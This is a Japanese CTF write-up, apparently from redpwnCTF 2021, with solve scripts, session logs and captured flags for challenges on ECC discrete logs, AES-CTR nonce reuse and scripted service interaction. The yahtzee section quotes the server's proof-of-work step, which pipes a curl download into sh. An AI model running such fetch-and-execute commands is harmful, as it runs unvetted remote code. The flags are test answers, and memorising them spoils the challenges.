                 74 65 72 00
        00103b7f 00              ??         00h

このあたりの文字列を確認しながら、いろいろと試してみて、正しい回答を導き出す。

from pwn import *

if len(sys.argv) == 1:
    p = remote('mc.ax', 31796)
else:
    p = process('./bread')

## add ingredients to the bowl ##
todoes = ['add flour', 'add yeast', 'add salt', 'add water']
data = p.recvline().rstrip()
print data
for i in range(4):
    print todoes[i]
    p.sendline(todoes[i])
    data = p.recvline().rstrip()
    print data

data = p.recvline().rstrip()
print data

## the ingredients are added and stirred into a lumpy dough ##
todoes = 'hide the bowl inside a box'
data = p.recvline().rstrip()
print data
print todoes
p.sendline(todoes)
data = p.recvline().rstrip()
print data

data = p.recvline().rstrip()
print data

## the bread needs to rise ##
todoes = 'wait 3 hours'
data = p.recvline().rstrip()
print data
print todoes
p.sendline(todoes)
data = p.recvline().rstrip()
print data

data = p.recvline().rstrip()
print data

## it is time to finish the dough ##
todoes = 'work in the basement'
data = p.recvline().rstrip()
print data
print todoes
p.sendline(todoes)
data = p.recvline().rstrip()
print data

data = p.recvline().rstrip()
print data

## the dough is done, and needs to be baked ##
todoes = 'preheat the toaster oven'
data = p.recvline().rstrip()
print data
print todoes
p.sendline(todoes)
data = p.recvline().rstrip()
print data

data = p.recvline().rstrip()
print data

## the bread is in the oven, and bakes for 45 minutes ##
todoes = 'set a timer on your phone'
data = p.recvline().rstrip()
print data
print todoes
p.sendline(todoes)
data = p.recvline().rstrip()
print data

data = p.recvline().rstrip()
print data

## 45 minutes is an awfully long time ##
todoes = 'watch the bread bake'
data = p.recvline().rstrip()
print data
print todoes
p.sendline(todoes)
data = p.recvline().rstrip()
print data

data = p.recvline().rstrip()
print data

## there's no time to waste ##
todoes = ['pull the tray out with a towel']
data = p.recvline().rstrip()
print data
for i in range(1):
    print todoes[i]
    p.sendline(todoes[i])
    data = p.recvline().rstrip()
    print data

data = p.recvline().rstrip()
print data

## there's smoke in the air ##
todoes = ['unplug the oven', 'unplug the fire alarm', 'open the window']
data = p.recvline().rstrip()
print data
for i in range(3):
    print todoes[i]
    p.sendline(todoes[i])
    data = p.recvline().rstrip()
    print data

data = p.recvline().rstrip()
print data

## the kitchen is a mess ##
todoes = ['wash the sink', 'clean the counters', 'flush the bread down the toilet', 'get ready to sleep']
data = p.recvline().rstrip()
print data
for i in range(4):
    print todoes[i]
    p.sendline(todoes[i])
    data = p.recvline().rstrip()
    print data

data = p.recvline().rstrip()
print data

## time to go to sleep ##
todoes = ['close the window', 'replace the fire alarm', 'brush teeth and go to bed']
data = p.recvline().rstrip()
print data
for i in range(3):
    print todoes[i]
    p.sendline(todoes[i])
    data = p.recvline().rstrip()
    print data

data = p.recvline().rstrip()
print data

for _ in range(3):
    data = p.recvline().rstrip()
    print data

実行結果は以下の通り。

[+] Opening connection to mc.ax on port 31796: Done
add ingredients to the bowl
add flour
flour has been added
add yeast
yeast has been added
add salt
salt has been added
add water
water has been added

the ingredients are added and stirred into a lumpy dough
hide the bowl inside a box
the box is nice and warm

the bread needs to rise
wait 3 hours
the dough has risen

it is time to finish the dough
work in the basement
you bring a bottle of oil and a tray

the dough is done, and needs to be baked
preheat the toaster oven
the oven glows a soft red-orange

the bread is in the oven, and bakes for 45 minutes
set a timer on your phone
the timer ticks down

45 minutes is an awfully long time
watch the bread bake
the bread has risen, touching the top of the oven and catching fire

there's no time to waste
pull the tray out with a towel
the flaming loaf sizzles in the sink

there's smoke in the air
unplug the oven
the oven shuts off
unplug the fire alarm
you put the fire alarm in another room
open the window
cold air rushes in

the kitchen is a mess
wash the sink
the sink is cleaned
clean the counters
the counters are cleaned
flush the bread down the toilet
the half-baked bread is disposed of
get ready to sleep
everything appears to be okay

time to go to sleep
close the window
the window is closed
replace the fire alarm
the fire alarm is replaced
brush teeth and go to bed
you sleep very well

it's the next morning
mom doesn't suspect a thing, but asks about some white dots on the bathroom floor
flag{m4yb3_try_f0ccac1a_n3xt_t1m3???0r_dont_b4k3_br3ad_at_m1dnight}
[*] Closed connection to mc.ax port 31796
flag{m4yb3_try_f0ccac1a_n3xt_t1m3???0r_dont_b4k3_br3ad_at_m1dnight}

blecc (crypto)

全体的に比較的数値が小さいので、orderを素因数分解して離散対数問題を解く。

#!/usr/bin/sage
from Crypto.Util.number import *

p = 17459102747413984477
a = 2
b = 3
G = (15579091807671783999, 4313814846862507155)
Q = (8859996588597792495, 2628834476186361781)

F = FiniteField(p)
E = EllipticCurve(F, [a, b])
G = E.point(G)
Q = E.point(Q)
factors, exponents = zip(*factor(E.order()))
primes = [factors[i] ^ exponents[i] for i in range(len(factors))]
dlogs = []
for fac in primes:
    t = int(G.order()) / int(fac)
    dlog = discrete_log(t*Q, t*G, operation='+')
    dlogs += [dlog]

d = crt(dlogs, primes)
print '[+] d =', d
assert d * G == Q

flag = long_to_bytes(d)
flag = 'flag{%s}' % flag
print '[*]flag =', flag

実行結果は以下の通り。

[+] d = 7868191182322623331
[*]flag = flag{m1n1_3cc}
flag{m1n1_3cc}

yahtzee (crypto)

サーバの処理の概要は以下の通り。

・true_rng = TrueRNG(2)
 ・rolls = 2
・quitするまで以下繰り返し
 ・message = random_message().encode()
  ・quotesの25行のうちランダムの行をスペース区切りの配列にして、どこかの要素にフラグを挿入する。
 ・encrypted = encrypt(message, key, true_rng)
  ・nonce = true_rng.next()
   ・TrueRNG.yahtzee(2)
    ・dice = 2個の1~6のランダム値の配列
    ・diceの合計を返す。
  ・AES-CTR暗号化
   →表示

nonceは2~12の11通り。とりあえず出力を見てみる。

$ nc mc.ax 31076
proof of work: curl -sSfL https://pwn.red/pow | sh -s s.AAATiA==.z34uX6azbkYSA7Lxu93WPw==
solution: s.P908u4Z4PUcNfpELBVV51t3d2C19aIBqkSTEZ7nzpOGkUHOo2IgPxBa5YwiX/0wzOd5dm3/iACvJEpuOGdm5Fis7YHtDXZAOamUUxSzicaQAQ/owWvI60YAYv7q434ULEfrv/hhAaVZgfTeZtfIj75f6A2ScwsbniMaN6dO2RxaOSbdWR6g19uJEqQWx7lPNCFqL/f4cAi22xTSFa3bfEA==

============================================================================
=            Welcome to the yahtzee message encryption service.            =
=  We use top-of-the-line TRUE random number generators... dice in a cup!  =
============================================================================
Would you like some samples?
y
Ciphertext: 2c19383b50c4b6f73821318124a186a352d713f0432dccd6305367892a1d2495c61edbe1015ab4fee8f7bc34ab59b3abad8c59c5a3a7ae16a43f7c2b8d7acf5a3eb804936d507aed55142cb5259dab8f83124641f32c4dbca21daecc20a0e94ec9ce9980073ad53e3c
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712f206ae5d8f60ce46e51c0ed4d37954c0a647391b28e43185e8312420910ff15a79b4a2f0d111b7babc56d46d01a2c9d70bd7daf8c8c26c251c19d0325c86ec735a39b2819cc832
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 10f31e469309e0aa0c6768e852ebacb028d4fe71aa636e015d3117da86d6f5dde013d3327519b43a1ea81f81ea80800772c63e81314447e531d818de4ce8902f77047c0244b18fa2480794c0e6d74d3297c9b4e19c2e2160bfd114a24c7e657abac2e96d56a5e242135e52ff18b2632b59ad02e9
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 4fd2dfe89dc578470c8bed4059342f068405ce54719e6f1152ea1615ecb598b59bce9b13b231c6c51ec63337b3b12df13421ca0fcff1697944fbf91c39766c440f0b0c11ae9f9c01173d161c6649f5fa9fe10893274bd7a4f984adae98c0835133
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 8ec3ff77926c5e462412e17d4b342dba922f03e456b4a6abe96bdd6b824e343a1530224f69705abc80af990adda56b95a767d5f1a14392a59e105e0a3010f4795f596a2166e1a0242e35a071f2452a95da08dee32976d73751daea2d9d3466b1967bbbae522329c834
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 91135aa897cc7cf173e770d926f6cc00c95840aee34aa4ecf0dc2fd5fefbe641774ded4e5f69201dc68314579a03b380e86a2404f08c6ad03573c1f0cce76350b27d3e29a51ecbe37d9f6d63750947b90bc000c42270861980dcfc0ce782a8ce093a656a87b899584e1b1d6c
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 800d5afa8cdd67ec3df439cd2ca3ce0ac94e40aeea45b4e58fff6981ef84e548611fec0d207e0a23879e4044cd1ce4dd9c673741f1c97ede356384f689fd6450a97a7338ed1298ac6f9b69762e4a468239d45ed65d628b1d80c1
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 4297d8ecd3c26356428fbe430b342d53811d8f5c6c8e6a3725b84b00d4bac0b8b6aadc7da821ed9e15c072749ca61f8e773acc0d90f275240debb01a326621440f0b1006a282d5012e721e1f3208baeccdef008a645e94a3f6c1b6b2d5c1884674a7b36d3a6881
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 2c1e323b50caabfa382a3ec737bbc5b74cc613ea443082d77c5b73d26e1d1ee2964accd7065bbee2fbf08c7a8565f4e9f98a01d0faa8eb09b9697c36ca37c55d29f419c17c5479ff161f3daf6ac8be86c2025851fa017fa8ff0087d126a2bb12cfe3d7a93d68c93960c01af99c
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 8387826491977894a631ffc36ceceeeec47b3d1413b2eec57122b48bdfbc1e89505278536a206704ea830cf6b58c15b8ed8f6e7d162a535f1387ba3672383fd60d798218cf30d6bd6fcc2bc616243861b7adbb14ea6f86d582807e0a50505e92977e6f
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: a8218c72990c679179fdffdd06f220d75f1b95be324363c5d71e926a7ac77d8260934a4b7bbbada3f22031a71201770cbfde374d343ee8435be5f606a7d6a2ac7f098e84ccb900ac8b9631138636db48f0ff4bce8f4d5f3e569d2f985b76fefe8ec454dc82c3fe99f3937b309a68bb75
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 9b8ce0328d7e5f51240aef321e2161ba873113e26697b2fcf155ce78d754581e7e6f194f2e764bbc83acbf19b2943d8db667c5ecb95ad7e996465a0d2444fa674859603675e5bf777a25ac77f710389e830bd3aa2663927958c4b2
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5ce50a46cb817855c3a04139192fa039dca972203b810efd4268f5a2f6c207ebba8104dc6545e388c900ccd6e4c5d16c241f4e93★
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 2a133a7e50c7bdfc383a3fc025f2c8ad549254fb582d85de3b12779a7b015bbb9d5a8fc9145ca5acb2f7c3298b6be5b1b0930cc6fabbae0da2277120983cd5436ceb1493675a72be1a1069b02889bf91930d7c36a66f5cc3ba1cbdd77db4964ff3e38a881629973d6b8d4aec9456181d
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 68b61df4fed11c522b7abf14f5541c6af3ab5efa3b51dba1cae8317e0ed78e2f4ebcb21ef8cce4853db51f3674afacfd084c92731e3d78ce919c483be73bc01d472a3cccd867a148cea9242077712d317be9282fe13519888b336b35dd
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 3d00326944d1b0e7762977d83ea7d0a700d45fff4b22dcd8036534c36e2a0faa975d9ccd2a5c9ed3e8ea9728d476f9b8f99b1fd0a8faf91ba33d7021ca33d30f23f64095605437f1011e2ca4649bb18ec6454c07b2384dfdbc5a
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 9296d97a5b5eddf0bac5b768c84b2b1d907a825a6b20e5213c206b2fb249b912d347bc10cd6bc45ce95d4fc8d67749c6e544701822e43a90a93536629a25cb1d3ca193e7dc07eba98629db4f7ef087d30b88cef4d6962e2f54
Would you like some more samples, or are you ready to 'quit'?
y
Ciphertext: 9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84fe50a46cb817855c3a04139192fa039dca972203b810efd4268f5a2f6c207ebba8104dc6545e388c900ccd6e4c5d16c241f4e93★

2か所似ている暗号が出力されている。全体の長さが同じで、先頭40バイトが異なり、それ以降は全く同じため、フラグを挿入する前の文は同じで、nonceは同じと思われる。
先頭40バイトは以下の2パターンになっているはず。

・quotesの文の一部+flag
・flag+quotesの文の一部

先頭40バイトはkeyが同じなので、推測しながら復号する。異なる部分の暗号は以下の2つ

・9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f
・b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c
$ python xorstrings.py 9fdfcf7a0944c1beedcbba7d8f477e55a24cdd0e3f16e5657933342b8c5e856d8848bb429f7ed84f b893de780007c68f9a99e768b74826588f289a602506ce3e72357568a349b712fa06bf55dd7dce5c
274c11020943073177525d15380f580d2d64476e1a102b5b0b0641432f17327f724e041742031613

$ python cribdrag.py 274c11020943073177525d15380f580d2d64476e1a102b5b0b0641432f17327f724e041742031613
Your message is currently:
0	________________________________________
Your key is currently:
0	________________________________________
Please enter your crib: flag{
*** 0: "A per"
1: "*}cn8"
2: "wnh$|"
3: "de"`J"
4: "o/fV
        "
5: "%kP)"
6: "a]5&"
7: "W3:n"
8: "><rC"
9: "41t_t"
10: ";yYh#"
*** 11: "sTn?v"
12: "^c9jV"
13: "i4lJ"
14: ">aL<"
15: "kA "
16: "&	a"
17: "+}k"
18: "!{wP"
19: vqL "
20: "||J<p"
21: "vG:l}"
*** 22: "M7ja:"
23: "=gg&8"
24: "mj $T"
25: "`-"Hl"
26: "'/NpI"
27: "%CvU"
28: "I{S	"
29: "q^5"
30: "T)"
31: "/cl"
32: ""ep9"
33: "(hv%x"
34: "b{#dm"
*** 35: "q.bqh"
Enter the correct position, 'none' for no match, or 'end' to quit: 0
Is this crib part of the message or key? Please enter 'message' or 'key': key
Your message is currently:
0	A per___________________________________
Your key is currently:
0	flag{___________________________________
Please enter your crib: flag{
*** 0: "A per"
1: "*}cn8"
2: "wnh$|"
3: "de"`J"
4: "o/fV
        "
5: "%kP)"
6: "a]5&"
7: "W3:n"
8: "><rC"
9: "41t_t"
10: ";yYh#"
*** 11: "sTn?v"
12: "^c9jV"
13: "i4lJ"
14: ">aL<"
15: "kA "
16: "&	a"
17: "+}k"
18: "!{wP"
19: vqL "
20: "||J<p"
21: "vG:l}"
*** 22: "M7ja:"
23: "=gg&8"
24: "mj $T"
25: "`-"Hl"
26: "'/NpI"
27: "%CvU"
28: "I{S	"
29: "q^5"
30: "T)"
31: "/cl"
32: ""ep9"
33: "(hv%x"
34: "b{#dm"
*** 35: "q.bqh"
Enter the correct position, 'none' for no match, or 'end' to quit: 9
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	A per____flag{__________________________
Your key is currently:
0	flag{____41t_t__________________________
Please enter your crib: son 
0: "T#""
1: "?~l)"
*** 2: "bmgc"
3: "qf-'"
4: "z,i"
5: "0h_W"
6: "t^r"
7: "B<}"
8: "=35"
9: "!2{"
10: ".zV/"
*** 11: "fWax"
12: "K`6-"
"3: "|7c
14: "+bCD"
15: "~B
g"
16: "^
      )N"
17: "(:"
18: "4t0"
19: "u~
        "
20: "iE{"
21: "cD5+"
22: "X4e&"
23: "(dha"
24: "xi/c"
25: "u.-"
*** 26: "2,A7"
27: "0@y"
28: "\x\_"
29: "d]R"
30: "An"
31: "
      $"
32: "!j7"
33: "=kyb"
34: "wx,#"
35: "d-m6"
*** 36: "1lx3"
Enter the correct position, 'none' for no match, or 'end' to quit: 5
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	A person flag{__________________________
Your key is currently:
0	flag{0h_W41t_t__________________________
Please enter your crib: 0h_W41t_t
0: "$NU=rsn"
1: "|y]^w6E(&"
)" "!jV3
3: "2aPF&a"
4: "9+XfCc)JL"
5: "son flag{"
6: "7Y(i$LP,"
7: "
!	{y"
8: "G:B
        >,RY"
9: "b5Jo;iyr"
10: "m}gXl<Y;3"
11: "%PP9"
12: gZU31n"
13: "?0RzPvEd"
14: "her3s_nO_"
15: "=E;Z+dt/"
16: "
      9.!_"
17: "T/1M$/Tr"
18: "wEGjY5"
19: "^rO|o:r7"
20: "*xt
        ?75["
21: " C\2p7pc"
22: "3TQur[HF"
23: "kcYwcm
             "
24: ";n&F "
25: "6)x#
           -:"
26: "q+p@Np"
27: "sGHeKC:[c"
28: "m(FpH6"
29: "'Z %z5cw"
30: "-0&6\b"
31: "OS#swIg"
Enter the correct position, 'none' for no match, or 'end' to quit: 14
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	A person flag{0h_W41t_t_________________
Your key is currently:
0	flag{0h_W41t_ther3s_nO__________________
Please enter your crib: her3s_nO
0: "O)c1zi~"
1: "$tp:0X_8"
2: "yg{ptn"
3: "jl14B(<"
3Z""a&u
5: "+bCD!{w"
6: "oTa.JV@"
7: "Y nfga"
8: "7/&KP6B"
9: ":8g
       |cb"
10: "5pJ<+RC+"
11: "}]}k~r
"
12: "Pj*>^;)!"
13: "g=U"
14: "0h_W41t_"
15: "eHtE~d"
16: "E5]iOE"
17: "
     ")ct5D"
18: "/
      h#XeI"
19: "b(Th"
20: "ruYhxY/
            "
21: "xN)8u-`"
22: "C>y52AX"
23: "3ntr0py}"
24: "cc3p\H\0"
25: "n$1dm="
26: ")&]$A "
27: "+Je
         - K"
28: "Gr@LjX"
"=[y"W
30: "Z}wH,L"
31: "<7dmY"
32: "+v$1\x\"
Enter the correct position, 'none' for no match, or 'end' to quit: 23
Is this crib part of the message or key? Please enter 'message' or 'key': message
Your message is currently:
0	A person flag{0h_W41t_ther3s_nO_________
Your key is currently:
0	flag{0h_W41t_ther3s_nO_3ntr0py}_________
flag{0h_W41t_ther3s_nO_3ntr0py}

quaternion-revenge (crypto)

$ nc mc.ax 31868
n: 109407261225601290979646993307199045582771989091617528040453388668527729655364021294073786236928010288425931170033882500008141737282348381080859938184708804261036670840857901348501188283821065103049160013518150182035783438575945282872216684014487995809554297629331427519782755136732060248945297800684475538669
l: 1024
c1: 8004256688474344817870233833875940222941935887236015063020756596204632736684872367826070568041179498012108632998282142428784927079034900107638096754487286
c2: 4072287980754638763334170410426881140079193675181120657395601634493823175738330991693959371966799518587104964948856594595459994325207179456447135423397260
Calculate the left quaternion isomorphism of m:
>>> 

適当に試してみる。

$ nc mc.ax 31868
n: 86130025636062055956513705083930642167992989060850106586281533247785660295367892438990867856454597008437399796578554368813552223751092749003124747057080792118304583487867234267309926248815120163138042117181301840830034157223307134822520786058567011588349160660968369137756745079514802619272300098374308411299
l: 1023
c1: 9593237318463895403485245835019899101341699250286125466299423268449833221079568272438381700968557138900898253166344975020822465215214852631020599973244033
c2: 4265549705909481277885344297128796851846735962116752700305188804452208934636515673843776196495539597068674270572889618802045156010757400818748543749630735
Calculate the left quaternion isomorphism of m:
>>> i+j
flag{00p5_1_l13d_r0fl}

フラグが表示された。i*jでも表示されるが、理論的な説明はできない。

flag{00p5_1_l13d_r0fl}

survey (misc)

アンケートに答えたら、以下のURLが表示された。

https://static.redpwn.net/content/survey-i9cbpsiv2d6x3zz9.txt

ここにアクセスしたら、フラグが表示された。

flag{thank5_f0r_play1ng_r3dpwnctf_2021!_zc9e848yg2gdhwxz}